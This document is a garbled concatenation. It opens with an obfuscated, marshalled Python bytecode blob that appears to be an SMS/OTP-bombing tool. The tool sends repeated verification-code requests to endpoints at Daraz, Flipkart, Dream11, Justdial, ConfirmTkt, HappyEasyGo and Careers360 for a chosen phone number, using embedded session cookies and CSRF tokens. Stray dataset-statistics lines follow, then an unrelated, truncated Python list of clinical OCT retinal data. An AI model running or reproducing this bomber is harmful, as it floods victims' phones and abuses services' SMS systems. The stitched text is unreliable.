\x00\x00\x00\xa9\x02r\x1c\x00\x00\x00r1\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x05sport\xd6\x00\x00\x00r\x85\x00\x00\x00r\x8b\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00r\x88\x00\x00\x00)\x04N\xda\x08registerz8https://securedapi.confirmtkt.com/api/platform/register?z\rmobileNumber=r\x89\x00\x00\x00r\x8a\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x05confi\xd9\x00\x00\x00r\x85\x00\x00\x00r\x8d\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x0c\x00\x00\x00C\x00\x00\x00s2\x00\x00\x00t\x00d\x01d\x02d\x03d\x04d\x05d\x06d\x07d\x08d\td\nd\x0b\x9c\x03d\x0c\x9c\x05d\r\x9c\x05}\x00d\x03|\x00d\x02f\x03}\x01d\x00S\x00)\x0eNz\x0bDaraz 
Nepal\xda\x04POSTz8https://member.daraz.com.np/user/api/sendVerificationSms\xfa\x03{t}Z\x0cOTP_REGISTERz\x031.0\xda\r57343b8557abez\xad01c5Cm2zXRNC4HBmgowjSMgdDZs8R8_HiarjNJvQVNRQBo-5zZpCcc-Zj0iwNLRAPi_SACvQ7y0gh3d0xIxWmtGGCPTxLVPmFVWgNrJfbz2ImfJ101mR7baXTMfdORIfsfpQW4fdLsxshenbUQO8lwb2sGKUvcuMnbQ2Vij1rs8Mca\x82\x01\x00\x0005zgTBSfCmaRhumYWJquIqH4hNnR97lsAI6h-TpDtXOlYgRSytFdmbAkXULTnXVAqXcR0WS1oEGjtfSXCpSmdPvM2zI7hQmE8MbniWbliwF_AqYl5HflEiG6vbAxHSztx4Y30K7LLjCSmwr25R327f9PlS1AeWd_f-1vm-K7e2UVHuSDCV-8-LXtZvs7hfhYwX3glWz1VuFC8gyZO6s6WwGtvX9_6OryBXnVj9xRJFLoJXiHKzK6kL5OBYn5cQocuyd-YE5qz7FT1nhV-OJd30HTjTYD_eB26UgWPKnOoMkN3rSGI_cWYQapqRr3-XtxG_M0qLZNkARUbI0nFbC1WM2k5y_SDbfOIiD0qmkYq8epRNmn6YVyee4-6qNCP0-9duz&QPXW:1638536554908:0.22529358478093664)\x03Z\ncsessionid\xda\x03sig\xda\x05token)\x05r:\x00\x00\x00\xda\x04typeZ\rlzdAppVersion\xfa\x0cX-CSRF-TOKENZ\x07ncToken)\x05Z\x0bficationSmsr/\x00\x00\x00\xda\x06methodr\x1a\x00\x00\x00rR\x00\x00\x00r\x89\x00\x00\x00r\x8a\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x01a\xdc\x00\x00\x00s\x04\x00\x00\x00$\x01\x0e\x01r\x96\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s\x1e\x00\x00\x00t\x00d\x01d\x02d\x03d\x04d\x05d\x06\x9c\x05d\x07\x9c\x02}\x00d\x08}\x01d\x00S\x00)\tNr\x90\x00\x00\x00\xda\x0eXMLHttpRequestz\x1bhttps://member.daraz.com.npzUhttps://member.daraz.com.np/user/register?spm=a2a0e.11779170.header.d6.287d2d2beUgUDGa\x1c\x05\x00\x00client_type=desktop; client_type=desktop; _uab_collina=163853655435166285176039; lzd_cid=513a1bfc-2422-443b-a785-b718cc4b9a97; t_uid=513a1bfc-2422-443b-a785-b718cc4b9a97; lzd_sid=1596976611e993378a7e8712bff593d8; _tb_token_=57343b8557abe; _m_h5_tk=1c359c412628e741d8061af8066b2786_1638546612338; _m_h5_tk_enc=e71f083e08aaac3c4656dbba4fd7f267; isg=BEtLmd06rrjcufJsuCw24ji_2e014F9iHdagY71JZQrh3Gg-T7Kks5c6tkQyZ7da; tfstk=cB9GBQ6Rp3UMVTcFeA66vxJtL30RaIwNzw7vLLlMF-gfer9CYs4QT7u8fSbZxvVf.; 
l=eBrDzCmggn-qWMsvBO5aourza779ZIOV1kPzaNbMiInca10P1Fsy9NCdbwDvRdtfQt5egUxP5OXRad3J5AU3-xT1-ak8mCOkJNJwRe1..; hng=NP|en-NP|NPR|524; xlly_s=1; t_fv=1638536534080; t_sid=sbjEWPRZmRzmrSChohIqKSi2jwleaEFn; utm_channel=NA; cna=VwMxGpE/lgsCAWejtvLLeM0O; daraz-marketing-tracker=hide; _gcl_au=1.1.666631300.1638536536; _ga_GEHLHHEXPG=GS1.1.1638536535.1.1.1638536561.0; _ga=GA1.1.1688897274.1638536536; _gid=GA1.3.38778064.1638536537; _fbp=fb.2.1638536539279.1824638069; cto_bundle=V_3F-18lMkZ4WVc4SUpEJTJGaXhxdkxMYVZYUmRNajFEV2ttODhPYUc2R2FnN2IwYVNjS3ZqSWI4RmpIbDN0dHdlT0E4QXlZN3dqd1pPbGJmbzdMWW9DVkVETzJaamd4eHlCUXhaNW1lTUQ0MEVuJTJGemFFVUVxUjdRemhnVlF2MFU3bmZKTGF4WU1FclJzVTV3cmFNZVh6d2hIcTJGd2clM0QlM0Q; G_ENABLED_IDPS=google; _ga=GA1.4.1688897274.1638536536; _gid=GA1.4.38778064.1638536537; _bl_uid=sgk9Uwm2qwgektdj777qdz3iym33)\x05r\x94\x00\x00\x00\xfa\x10X-Requested-With\xda\x06Origin\xda\x07RefererZ\x06Cookie)\x02r\x8c\x00\x00\x00\xda\x07headers)\x02z*https://member.daraz.com.np/user/register?z+spm=a2a0e.11779170.header.d6.287d2d2beUgUDGr\x89\x00\x00\x00r\x8a\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x01b\xdf\x00\x00\x00s\x04\x00\x00\x00\x16\x01\x08\x01r\x9c\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s$\x00\x00\x00t\x00d\x01d\x02d\x03d\x04d\x05d\x06\x9c\x02d\x07\x9c\x05}\x00d\x08|\x00d\tf\x03}\x01d\x00S\x00)\nNZ\nconfirmtkt\xda\x03GETz7https://securedapi.confirmtkt.com/api/platform/register\xda\x04truer\x8f\x00\x00\x00)\x02Z\x06newOtpr~\x00\x00\x00)\x05r\x8c\x00\x00\x00r/\x00\x00\x00r\x95\x00\x00\x00r\x1a\x00\x00\x00\xda\x06paramsz/https://securedapi.confirmtkt.com/api/platform/r\x8c\x00\x00\x00r\x89\x00\x00\x00r\x8a\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x01c\xe2\x00\x00\x00s\x04\x00\x00\x00\x16\x01\x0e\x01r\xa0\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00\xf3"\x00\x00\x00t\x00d\x01d\x02d\x03d\x04d\x05i\x01d\x
06\x9c\x05}\x00d\x07|\x00d\x08f\x03}\x01d\x00S\x00)\tNZ\x08justdialr\x9d\x00\x00\x00zChttps://t.justdial.com/api/india_api_write/18july2018/sendvcode.phprQ\x00\x00\x00r\x8f\x00\x00\x00)\x05rQ\x00\x00\x00r/\x00\x00\x00r\x95\x00\x00\x00r\x1a\x00\x00\x00r\x9f\x00\x00\x00z6https://t.justdial.com/api/india_api_write/18july2018/z\rsendvcode.phpr\x89\x00\x00\x00r\x8a\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x01d\xe5\x00\x00\x00\xf3\x04\x00\x00\x00\x14\x01\x0e\x01r\xa2\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00r\xa1\x00\x00\x00)\tNZ\x0bhappyeasygor\x9d\x00\x00\x00z;https://www.happyeasygo.com/heg_api/user/sendRegisterOTP.dor:\x00\x00\x00z\x0891%20{t})\x05r:\x00\x00\x00r/\x00\x00\x00r\x95\x00\x00\x00r\x1a\x00\x00\x00r\x9f\x00\x00\x00z)https://www.happyeasygo.com/heg_api/user/z\x12sendRegisterOTP.dor\x89\x00\x00\x00r\x8a\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x01e\xe8\x00\x00\x00r\xa3\x00\x00\x00r\xa4\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00s&\x00\x00\x00t\x00d\x01d\x02d\x03d\x04d\x05d\x06d\x07\x9c\x03d\x08\x9c\x05}\x00d\t|\x00d\nf\x03}\x01d\x00S\x00)\x0bNZ\x07dream11r\x8e\x00\x00\x00z#https://api.dream11.com/sendsmslinkr\x12\x00\x00\x00r\x8f\x00\x00\x00Z\x0bandroidfull)\x03Z\x06siteId\xda\tmobileNumZ\x07appType)\x05r\xa5\x00\x00\x00r/\x00\x00\x00r\x95\x00\x00\x00r\x1a\x00\x00\x00rR\x00\x00\x00z\x18https://api.dream11.com/Z\x0bsendsmslinkr\x89\x00\x00\x00r\x8a\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x01f\xeb\x00\x00\x00s\x04\x00\x00\x00\x18\x01\x0e\x01r\xa6\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s.\x00\x00\x00t\x00d\x01d\x02d\x03d\x04d\x03d\x05i\x01d\x06d\x07d\x08d\t\x9c\x03d\n\x9c\x07}\x00d\x0b|\x00d\x0cf\x03}\x01d\x00S\x00)\rNZ\x08flipkartr\x8e\x00\x00\x00\xda\x07loginIdz0https://www.flipkart.com/api/5/user/otp/
generatez\x04+{t}zdMozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 FKUA/website/41/website/Desktopz\x18https://www.flipkart.comz!application/x-www-form-urlencoded)\x03z\x0cX-user-agentr\x99\x00\x00\x00\xfa\x0cContent-Type)\x07r\xa7\x00\x00\x00r/\x00\x00\x00r\x95\x00\x00\x00Z\tcc_targetr\x1a\x00\x00\x00rR\x00\x00\x00r\x9b\x00\x00\x00z(https://www.flipkart.com/api/5/user/otp/Z\x08generater\x89\x00\x00\x00r\x8a\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00r2\x00\x00\x00\xee\x00\x00\x00s\x1a\x00\x00\x00\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x04\x02\x02\xff\x02\x04\x02\x01\x02\x01\x04\xfd\x06\xf8\x0e\x0cc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x13\x00\x00\x00C\x00\x00\x00s\\\x00\x00\x00t\x00d\x01d\x02d\x03d\x04d\x05d\x06d\x06d\x07d\x08d\td\nd\x0bd\x0cd\rd\x0ed\x0fd\x10d\x11\x9c\x0ed\x12d\x13d\x14d\x15d\x16d\x17d\x18d\x19d\x1ad\x1b\x9c\td\x1cd\x1dd\x1ed\x1f\x9c\x03d \x9c\x07}\x00d!|\x00d"f\x03}\x01d\x00S\x00)#NZ\tcareer360r\x8e\x00\x00\x00z6https://www.careers360.com/ajax/no-cache/user/otp-sendz\x191.1.1168325424.1600579108Z 4584ba1e8345400d92392a88464c9183Z\x1bce35392c174a9f2fbe2f2c29a0cz\x1bGA1.2.1646044729.1600579108z\x1aGA1.2.365026440.1600579108z\x1dfb.1.1600579107930.1446075664z\nHome PagesZ@RI5TGK7tuZdkJjVNzu3lRdSeRcztdtYqfsLmngbNRK1lMH7Uir1qFprpSgCI2ZNyZ`RIeaJ0pgkcvqwRygRT8VTxJ6PrpnRvze6xwTpZBXztsuBXhgRV5OIU97g9s0DivdxwVAHM0DF1teulefRfsK0wCo2MRjp325Z\x06googler\x12\x00\x00\x00Z\r1600579353765z?%7B%22p%22%3A5%2C%22s%22%3A1600579103%2C%22t%22%3A1600579356%7D)\x0eZ\x07_gcl_auZ\x06WZRK_GZ\x05__ascZ\x05__aucZ\x03_gaZ\x04_gidZ\x04_fbpZ\ndataLayer_Z\tcsrftokenZ\x08_omappvpZ\x0eG_ENABLED_IDPSz\x15_dc_gtm_UA-46098128-1Z\x08_omappvsz\x13WZRK_S_654-ZZ4-5Z5ZZ@9tKY96jb358WKiZBMwhz2EcranwljWDbxdqrQCnvqQWXNGbIvtfEQQLCbrzA8ssjr\x97\x00\x00\x00zrMozilla/5.0 (Linux; Android 10; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.101 Mobile Safari/537.36z0application/x-www-form-urlencoded; 
charset=UTF-8z\x1ahttps://www.careers360.comz\x0bsame-originZ\x04cors\xda\x05emptyz\x84https://www.careers360.com/user/otp-verify/101e8d6e591af6688f640eee08f5a5f8?destination=&click_location=header&google_success=header)\tz\x0bX-CSRFTokenr\x98\x00\x00\x00z\nUser-Agentr\xa8\x00\x00\x00r\x99\x00\x00\x00z\x0eSec-Fetch-Sitez\x0eSec-Fetch-Modez\x0eSec-Fetch-Destr\x9a\x00\x00\x00r\x8f\x00\x00\x00\xda\x04callZ\x0812692588)\x03\xda\rmobile_numberr\x95\x00\x00\x00Z\x03uid)\x07r\xab\x00\x00\x00r/\x00\x00\x00r\x95\x00\x00\x00r\x1a\x00\x00\x00Z\x07cookiesr\x9b\x00\x00\x00rR\x00\x00\x00z.https://www.careers360.com/ajax/no-cache/user/z\x08otp-sendr\x89\x00\x00\x00r\x8a\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x01h\xfc\x00\x00\x00s\x04\x00\x00\x00N\x01\x0e\x01r\xac\x00\x00\x00)\x01\xda\x06targetz\x1fespeak "can , i help u?" -s 120z\x15Can I Help u?[yes/no]Z\x03yes\xda\x01yz*espeak "ok go to telegram , SaD WX" -s 120z\x17ok go to telegram SaDWXz\x1cxdg-open https://t.me/WX_SaDZ\x02no\xda\x01nz%ok please wait for running again toolz\x0epython SBWX.pyz\x0cSaDWX githubz\x0cgo to githubg\x9a\x99\x99\x99\x99\x99\xb9?\xda\x013z"xdg-open https://github.com/WIROUXz.espeak "Do you want to leave the tool?" -s 120z&Do you want to leave the tool?[yes/no]z\x1cespeak "khoda ha fez" -s 120z\x06ok byez+espeak "Do you want to restart too?" 
-s 120z#Do you want to restart too[yes/no]?z\x15tool running again...z\x15ok wait for exit toolg\x9a\x99\x99\x99\x99\x99\xa9?Z\x03333Z\x0222g{\x14\xaeG\xe1z\x84?)T\xda\x02os\xda\x06system\xda\x03sysrj\x00\x00\x00ru\x00\x00\x00rU\x00\x00\x00r\x03\x00\x00\x00rT\x00\x00\x00\xda\x05unameZ\x04oswxr\n\x00\x00\x00Z\tthreadingr\x0b\x00\x00\x00\xda\x01tZ\x08coloramar\x06\x00\x00\x00r\x0c\x00\x00\x00r(\x00\x00\x00Z\rLIGHTBLACK_EX\xda\x05sleepr-\x00\x00\x00r.\x00\x00\x00Z\rLIGHTGREEN_EXZ\x0fLIGHTMAGENTA_EXr\x07\x00\x00\x00r,\x00\x00\x00r+\x00\x00\x00r*\x00\x00\x00\xda\x05inputr)\x00\x00\x00Z\x02WX\xda\x04node\xda\x07version\xda\x07machineZ\tprocessorZ\x07MAGENTAr7\x00\x00\x00r<\x00\x00\x00\xda\x03strr1\x00\x00\x00r2\x00\x00\x00r5\x00\x00\x00r=\x00\x00\x00rA\x00\x00\x00rD\x00\x00\x00rF\x00\x00\x00rH\x00\x00\x00rJ\x00\x00\x00rO\x00\x00\x00rV\x00\x00\x00rW\x00\x00\x00rY\x00\x00\x00r\\\x00\x00\x00r]\x00\x00\x00r^\x00\x00\x00r`\x00\x00\x00rc\x00\x00\x00rd\x00\x00\x00rf\x00\x00\x00rx\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00r{\x00\x00\x00r|\x00\x00\x00r}\x00\x00\x00r\x7f\x00\x00\x00r\x81\x00\x00\x00r\x83\x00\x00\x00r\x84\x00\x00\x00r\x86\x00\x00\x00r\x87\x00\x00\x00r\x8b\x00\x00\x00r\x8d\x00\x00\x00r\x96\x00\x00\x00r\x9c\x00\x00\x00r\xa0\x00\x00\x00r\xa2\x00\x00\x00r\xa4\x00\x00\x00r\xa6\x00\x00\x00r\xac\x00\x00\x00\xda\x05start\xda\x01q\xda\x04exitZ\x0ekos_nanat_khobr\x08\x00\x00\x00r\x08\x00\x00\x00r\x08\x00\x00\x00r\t\x00\x00\x00\xda\x08<module>\x01\x00\x00\x00s\xa4\x04\x00\x00\x08\x01\n\x01\n\x01\n\x01\n\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\n\x01\x08\x01\x0c\x05\x10\x01\x0e\x02\n\x01\n\x01\x0e\x01\n\x01\n\x01\n\x01\n\x01\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03
\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x06\xf8\x0e\t\x0e\x01\n\x01\n\x01\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x01\x02\xff\x02\x01\x02\xff\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x06\xfe,\x04\n\x01\n\x01\n\x01\x14\x01\x86\x01\n\x01\n\x01\n\x01\n\x01\n\x01\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x02\x02\xfe\x02\x02\x02\xfe\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x03\x02\xfd\x02\x03\x02\xfd\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\
x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x04\x02\xfc\x02\x04\x02\xfc\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x05\x02\xfb\x02\x05\x02\xfb\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x06\x02\xfa\x02\x06\x02\xfa\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x07\x02\xf9\x02\x07\x02\xf9\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x02\xf8\x04\x08\x02\xf8\x02\x08\x06\xf8,\x0b\x08\x01\x0e\x01\x0e\t\x08\t\x08\x05\x08\x05\x08\x04\x08\x04\x08\x04\x08\x04\x08\x04\x08\x04\x08\x05\x08\x05\x08\x05\x08\x05\x08\x06\x08\x04\x08\x04\x08\x04\x08\x04\x08\x05\x08\x07\x08\x05\x08\x04\x08\x04\x08\x03\x08\x04\x08\x04\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x03\x08\x0e\x0e\x03\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x0e\x01\x12\x01\x14\x01\n\x01\n\x01\x08\x01\x14\x01\n\x01\x0e\x01\n\x01\x0e\x01\x14\x01\x0e\x01\n\x01\x0e\x01\x04\xfd\x14\x04\n\x01\x0e\x01\x0e\x01\n\x01\x08\x01\n\x01\x08\x01\n\x01\x08\x01\x0e\x01\x14\x01\n\x01\n\x01\x0e\x01\x14\x01\n\x01\n\x01\x0e\x01\n\x01\x14\x01\n\x
01\x0e\x01\x14\x01\x0e\x01\n\x01\x0e\x01\x14\x01\n\x01\x0e\x01\n\x01\x0e\x01\n\x01\x0e\x01\n\x01\x0e\x01\n\x01\n\x01\x04\xe6\x04\t\x04\x07'))
"))
| 21,252.666667
| 63,742
| 0.999498
| 27
| 63,758
| 2,360.222222
| 0.962963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098943
| 0.000063
| 63,758
| 2
| 63,743
| 31,879
| 0.900618
| 0
| 0
| 0
| 0
| 0.5
| 0.999341
| 0.999341
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
6906314ed03fc56487dde6feee91b2b5e5493062
| 8,305
|
py
|
Python
|
oct_data/chronic_control_clinical.py
|
dianajosephm12/oct-sz-ai
|
c8fa4560309b6c0018109027345a80afdc4589fb
|
[
"MIT"
] | null | null | null |
oct_data/chronic_control_clinical.py
|
dianajosephm12/oct-sz-ai
|
c8fa4560309b6c0018109027345a80afdc4589fb
|
[
"MIT"
] | null | null | null |
oct_data/chronic_control_clinical.py
|
dianajosephm12/oct-sz-ai
|
c8fa4560309b6c0018109027345a80afdc4589fb
|
[
"MIT"
] | null | null | null |
# Age Sex Race Simp_Race Ethnicity Handedness WTAR_raw WTAR_scaled Corrected_vision OSLogMar ODLogMar BinocularLogMar Education Degree OS_RNFL OS_Cup_Disc_Ratio OS_Cup_Volume OD_RNFL OD_Cup_Disc_Ratio OD_Cup_Volume RNFLsymmetry OS_SUP_value OS_TEM_value OS_INF_value OS_NAS_value OD_SUP_value OD_TEM_value OD_INF_value OD_NAS_value LMac12 LMac3 LMac6 LMac9 RMac12 RMac3 RMac6 RMac9 OS_macula_csf OS_Volume_Cube OS_Thickness_Avg_Cube OD_macula_csf OD_Volume_Cube OD_Thickness_Avg_Cube GCL_IPL_Avg_OS GCL_IPL_Avg_OD
chronic_control_full_clinical = [[46, 1, 5, 1, 2, 1, 34, 101, 2, 0.0, 0.0, 0.0, 15, 3, 98, 0.52, 0.149, 99, 0.50, 0.155, 93, 132, 64, 131, 63, 121, 59, 134, 81, 268, 258, 263, 297, 266, 304, 266, 258, 261, 9.90, 274, 267, 10.00, 278, 79, 80], [49, 2, 5, 1, 2, 1, 49, 123, 2, 0.1, 0.0, 0.0, 19, 5, 94, 0.14, 0.009, 99, 0.08, 0.000, 86, 102, 66, 132, 77, 118, 67, 141, 70, 286, 260, 262, 296, 287, 297, 269, 269, 292, 10.30, 286, 289, 10.30, 287, 78, 79], [56, 2, 5, 1, 2, 2, 27, 92, 1, 0.1, 0.3, 0.0, 18, 4, 102, 0.56, 0.122, 109, 0.54, 0.107, 90, 117, 70, 127, 95, 120, 75, 141, 99, 300, 277, 282, 323, 305, 333, 297, 280, 273, 10.80, 300, 281, 11.10, 308, 84, 87], [49, 1, 5, 1, 2, 1, 42, 113, 2, 0.3, 0.1, 0.1, 17, 4, 87, 0.49, 0.026, 89, 0.57, 0.162, 73, 117, 45, 110, 77, 120, 51, 108, 77, 271, 255, 262, 291, 272, 292, 260, 254, 289, 9.90, 275, 267, 9.90, 276, 76, 77], [45, 1, 5, 1, 1, 1, 46, 119, 1, 0.0, 0.0, -0.1, 17, 4, 86, 0.52, 0.148, 84, 0.47, 0.062, 64, 118, 50, 113, 64, 99, 72, 116, 48, 275, 260, 257, 295, 280, 294, 261, 263, 258, 10.00, 278, 258, 10.10, 280, 83, 84], [32, 1, 5, 1, 2, 1, 41, 113, 2, -0.1, 0.0, -0.1, 19, 6, 86, 0.59, 0.215, 91, 0.50, 0.123, 86, 113, 52, 112, 67, 118, 60, 119, 68, 282, 265, 271, 309, 281, 300, 264, 267, 263, 10.30, 286, 263, 10.20, 282, 82, 81], [38, 1, 5, 1, 1, 1, 32, 98, 2, 0.0, 0.0, -0.1, 17, 4, 106, 0.25, 0.024, 104, 0.43, 0.082, 82, 132, 68, 144, 79, 120, 74, 150, 73, 292, 11, 290, 303, 293, 303, 276, 279, 240, 10.50, 290, 244, 10.40, 290, 88, 88], [39, 1, 5, 1, 2, 2, 41, 111, 1, 0.0, 0.1, -0.1, 17, 4, 100, 0.55, 0.185, 101, 0.59, 0.177, 93, 118, 60, 138, 85, 115, 65, 141, 84, 282, 272, 281, 310, 284, 313, 281, 273, 287, 10.50, 290, 288, 10.80, 293, 88, 88], [32, 1, 5, 1, 1, 1, 33, 100, 2, 0.2, 0.3, 0.2, 19, 5, 84, 0.50, 0.107, 87, 0.54, 0.180, 92, 98, 57, 116, 65, 99, 65, 121, 63, 293, 277, 281, 320, 298, 311, 277, 277, 222, 10.30, 286, 220, 10.40, 288, 84, 85], [30, 1, 5, 1, 2, 1, 40, 111, 1, 0.1, 0.0, 0.0, 16, 3, 78, 0.37, 
